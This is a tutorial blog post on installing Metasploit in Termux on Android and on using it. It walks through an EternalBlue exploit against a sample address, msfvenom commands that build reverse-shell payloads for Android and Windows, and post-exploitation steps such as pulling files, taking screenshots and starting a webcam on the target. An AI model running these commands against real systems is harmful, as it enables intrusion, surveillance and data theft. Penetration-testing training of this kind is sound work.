Metasploit Framework in Termux

The Metasploit Framework is one of the most powerful penetration testing platforms available, and now you can run it directly on your Android device using Termux. This comprehensive guide from Sandeep Tech will walk you through the entire process of installing, configuring, and using Metasploit in Termux for ethical hacking and security testing purposes.

What is Metasploit Framework?

Metasploit Framework is an open-source penetration testing platform that enables you to find, exploit, and validate vulnerabilities. It's one of the most widely used tools by security professionals, ethical hackers, and penetration testers worldwide. The framework provides a comprehensive suite of tools for developing and executing exploit code against a remote target machine.

Why Use Metasploit in Termux?

Running Metasploit in Termux offers several advantages:

• Portability - Carry a powerful penetration testing platform in your pocket
• No Root Required - Works on non-rooted Android devices
• Cost-Effective - Free alternative to expensive penetration testing hardware
• Educational - Learn penetration testing techniques on the go
• Testing Environment - Quickly test your own networks for vulnerabilities
• Emergency Tool - Have a security toolkit available in emergency situations

Installation Guide

Installing Metasploit in Termux requires several steps due to its dependencies. Follow this guide carefully:

# Update and upgrade Termux packages
apt update && apt upgrade -y

Install the required dependencies:

# Install required packages
apt install wget curl git tar -y

Install the necessary development tools:

# Install development tools
pkg install openssl ruby make clang libffi libgmp libpcap postgresql readline sqlite -y

Install RubyGems and update it:

# Install RubyGems
gem install -v 1.17.2 bundler

# Update RubyGems
gem update --system

Now, let's install Metasploit Framework:

# Download Metasploit Framework
wget https://github.com/rapid7/metasploit-framework/archive/refs/tags/6.3.2.tar.gz

# Extract the archive
tar -xzf 6.3.2.tar.gz

# Navigate to the Metasploit directory
cd metasploit-framework-6.3.2

# Install the required gems
bundle install

Create a symbolic link to make msfconsole accessible from anywhere:

# Create a symbolic link
ln -sf $PWD/msfconsole /data/data/com.termux/files/usr/bin/msfconsole

# Make it executable
chmod +x /data/data/com.termux/files/usr/bin/msfconsole

Initialize the database:

# Initialize the database
msfdb init

Getting Started with Metasploit

Now that Metasploit is installed, let's start it and explore its interface:

# Start Metasploit console
msfconsole

When you first start Metasploit, you'll see a welcome screen and the msfconsole prompt:

      .--.        .-.
     | oo |   |   |
     |   |   |   |
 .-'   |   |   |
'      |   |   |
|      |   |   |
|      |   |   |
|      |   |   |
'------'   '---'

       =[ metasploit v6.3.2-dev                          ]
+ -- --=[ 2235 exploits - 1193 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom meterpreter script? Check
out the meterpreter scripting API documentation

msf6 > 
                        

The msfconsole prompt is where you'll enter all Metasploit commands. Let's explore some basic commands to get familiar with the interface.

Basic Usage and Commands

Here are some essential commands to get started with Metasploit:

Help and Information

# Show help menu
msf6 > help

# Show all commands
msf6 > ?

# Show information about a specific command
msf6 > ? search

Searching for Modules

# Search for exploits related to a specific service
msf6 > search type:exploit platform:windows smb

# Search for all modules related to Android
msf6 > search android

# Search for a specific module by name
msf6 > search eternalblue

Using Modules

# Use a specific module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Show information about the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > info

# Show options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Show advanced options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show advanced

# Show targets for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

Understanding Modules

Metasploit is modular, with each module serving a specific purpose. The main types of modules are:

• Exploits - Code that takes advantage of a vulnerability in a system
• Payloads - Code that runs on the target system after exploitation
• Auxiliary - Modules that perform scanning, fuzzing, sniffing, and other tasks
• Post - Modules that run on the target system after exploitation
• Evasion - Modules that help evade detection by security software
• Encoders - Modules that encode payloads to avoid detection
• Nops - Modules that generate no-operation instructions

Working with Payloads

Payloads are the code that runs on the target system after successful exploitation. Metasploit offers several types of payloads:

Types of Payloads

• Singles - Self-contained payloads that include everything needed to run
• Stagers - Small payloads that connect back to the attacker to download the rest of the payload
• Stageless - Complete payloads that don't require a staging process

Popular Payloads

# List all available payloads
msf6 > show payloads

# Set a payload for the current exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

# Show options for the current payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payload options

Custom Payloads

You can create custom payloads using msfvenom, which is included with Metasploit:

# Create a custom Android payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > /sdcard/apk.apk

# Create a custom Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe

Using Exploits

Exploits are the core of Metasploit. Let's walk through the process of using an exploit:

# Select an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Set the target IP address
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.200

# Set the payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

# Set the local host (your IP)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.100

# Set the local port
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444

# Verify the settings
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

If the exploit is successful, you'll get a Meterpreter session on the target system:

Post-Exploitation

Once you have a Meterpreter session, you can perform various post-exploitation tasks:

# Get system information
meterpreter > sysinfo

# Get current user
meterpreter > getuid

# List processes
meterpreter > ps

# List files in current directory
meterpreter > ls

# Change directory
meterpreter > cd C:\\

# Upload a file to the target
meterpreter > upload /sdcard/file.txt C:\\

# Download a file from the target
meterpreter > download C:\\important_file.txt /sdcard/

# Take a screenshot
meterpreter > screenshot

# Start the webcam
meterpreter > webcam_start

# Execute a command on the target
meterpreter > execute -f cmd.exe -c "whoami"

# Get a shell on the target
meterpreter > shell

Advanced Features

Metasploit offers several advanced features for more sophisticated penetration testing:

Pivoting

Pivoting allows you to route traffic through a compromised system to access other systems on the network:

# Add a route through the compromised system
meterpreter > run post/multi/manage/autoroute

# Background the current session
meterpreter > background

# Use the new route to scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.2.0/24
msf6 auxiliary(scanner/portscan/tcp) > run

Session Management

Metasploit allows you to manage multiple sessions simultaneously:

# List all active sessions
msf6 > sessions

# Interact with a specific session
msf6 > sessions -i 1

# Background the current session
meterpreter > background

# Kill a session
msf6 > sessions -k 1

Database Integration

Metasploit can integrate with a database to store scan results and manage hosts:

# Connect to the database
msf6 > db_connect

# Add hosts to the database
msf6 > db_nmap -sV 192.168.1.0/24

# List all hosts in the database
msf6 > hosts

# List all services in the database
msf6 > services

# List all vulnerabilities in the database
msf6 > vulns

Ethical Considerations

While Metasploit is a powerful tool, it's important to use it ethically and responsibly:

• Authorization - Always obtain explicit permission before testing any system
• Scope - Clearly define the scope of your testing and stay within it
• Documentation - Document all your findings and actions
• Confidentiality - Keep all sensitive information secure
• Non-Destructive - Avoid actions that could disrupt services or cause data loss
• Legal Compliance - Follow all applicable laws and regulations

Interactive Demo

Command Reference

You've now learned how to install and use Metasploit Framework in Termux. This powerful combination brings professional penetration testing capabilities to your Android device. For more tutorials and guides, check out other articles on Sandeep Tech. Remember to always use these tools ethically and with proper authorization.